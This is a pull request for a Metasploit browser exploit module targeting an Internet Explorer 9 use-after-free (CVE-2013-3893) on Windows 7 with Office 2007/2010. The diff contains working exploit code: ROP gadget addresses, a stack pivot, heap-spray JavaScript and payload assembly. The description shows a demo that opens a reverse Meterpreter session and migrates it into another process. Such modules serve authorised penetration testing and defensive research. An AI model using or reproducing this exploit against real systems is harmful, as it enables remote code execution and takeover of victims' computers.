### PR TITLE
Use BrowserExploitServer mixin for ie_setmousecapture_uaf.rb

### DIFF
--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -8,8 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::RopDb
+  include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
     super(update_info(info,
@@ -35,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
           To mimic the same exploit found in the wild, this module will try to use the same DLL
           from Microsoft Office 2007 or 2010 to leverage the attack.
-
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -53,10 +51,18 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]
         ],
       'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source    => /script/i,
+          :os_name   => OperatingSystems::WINDOWS,
+          :ua_name   => HttpClients::IE,
+          :ua_ver    => "9.0",
+          :os_flavor => "7",
+          :office    => /2007|2010/
+        },
       'Targets'        =>
         [
-          [ 'Automatic', {} ],
-          [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]
+          [ 'Automatic', {} ]
         ],
       'Payload'        =>
         {
@@ -73,55 +79,17 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  def is_win7_ie9?(agent)
-    (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
-  end
-
-  def get_preq_html(cli, req)
-    %Q|
-<html>
-<script>
-  function getDLL() {
-    var checka = 0;
-    var checkb = 0;
-
-    try {
-      checka = new ActiveXObject("SharePoint.OpenDocuments.4");
-    } catch (e) {}
-
-    try {
-      checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
-    } catch (e) {}
-
-    if ((typeof checka) == "object" && (typeof checkb) == "object") {
-      return "office2010";
-    }
-    else if ((typeof checka) == "number" && (typeof checkb) == "object") {
-      return "office2007";
-    }
-
-    return "na";
-  }
-
-  window.onload = function() {
-    document.location = "#{get_resource.chomp("/")}/#{@exploit_page}?dll=" + getDLL();
-  }
-</script>
-</html>
-    |
-  end
-
   def junk
     return rand_text_alpha(4).unpack("V")[0].to_i
   end
 
-  def get_payload(rop_dll)
+  def get_payload(target_info)
     code = payload.encoded
     rop  = ''
     alignment = ''
 
-    case rop_dll
-    when :office2007
+    case target_info[:office]
+    when '2007'
       alignment =
       [
         junk,        # Alignment
@@ -129,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
       rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
 
-    when :office2010
+    when '2010'
       alignment =
       [
         # 4 dword junks due to the add esp in stack pivot
@@ -148,10 +116,10 @@ class Metasploit3 < Msf::Exploit::Remote
     p
   end
 
-  def get_exploit_html(cli, req, rop_dll)
+  def get_exploit_html(cli, target_info)
     gadgets = {}
-    case rop_dll
-    when :office2007
+    case target_info[:office]
+    when '2007'
       gadgets[:spray1] = 0x1af40020
 
       # 0x31610020-0xc4, pointer to gadgets[:call_eax]
@@ -173,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # ret
       gadgets[:pivot] = 0x51be4418
 
-    when :office2010
+    when '2010'
       gadgets[:spray1] = 0x1a7f0020
 
       # 0x30200020-0xc4, pointer to gadgets[:call_eax]
@@ -199,12 +167,10 @@ class Metasploit3 < Msf::Exploit::Remote
       gadgets[:pivot]    # stack pivot
     ].pack("V*")
 
-    p1 << get_payload(rop_dll)
+    p1 << get_payload(target_info)
 
-    p2 =
-    [
-      gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)
-    ].pack("V*")
+    # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)
+    p2 = [ gadgets[:call_eax] ].pack("V*")
 
     js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack("V*"))
     js_p1 = Rex::Text.to_unescape(p1)
@@ -272,40 +238,9 @@ window.onload = function() {
     |
   end
 
-  def on_request_uri(cli, request)
-    agent = request.headers['User-Agent']
-    unless is_win7_ie9?(agent)
-      print_error("Not a suitable target: #{agent}")
-      send_not_found(cli)
-    end
-
-    html = ''
-    if request.uri =~ /\?dll=(\w+)$/
-      rop_dll = ''
-      if $1 == 'office2007'
-        print_status("Using Office 2007 ROP chain")
-        rop_dll = :office2007
-      elsif $1 == 'office2010'
-        print_status("Using Office 2010 ROP chain")
-        rop_dll = :office2010
-      else
-        print_error("Target does not have Office installed")
-        send_not_found(cli)
-        return
-      end
-
-      html = get_exploit_html(cli, request, rop_dll)
-    else
-      print_status("Checking target requirements...")
-      html = get_preq_html(cli, request)
-    end
-
+  def on_request_exploit(cli, request, target_info)
+    html = get_exploit_html(cli, target_info)
     send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
-  end
-
-  def exploit
-    @exploit_page = "default.html"
-    super
   end
 
 end


### PR DESCRIPTION
Instead of the usual HttpServer::HTML, this module now uses the BrowserExploitServer mixin - smarter and more targeted.

Demo:

```
$ git status
# On branch ie_setmousecapture_uaf_bes_update
nothing to commit, working directory clean
$ msfconsole -q
msf > use exploit/windows/browser/ie_setmousecapture_uaf 
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/gXMD87QbquZMz
[*]  Local IP: http://10.0.1.76:8080/gXMD87QbquZMz
[*] Server started.
msf exploit(ie_setmousecapture_uaf) > [*] 10.0.1.76        ie_setmousecapture_uaf - Gathering target information.
[*] 10.0.1.76        ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:61866) at 2014-03-25 18:45:36 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.76:61866) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (1240)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2036
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >
```
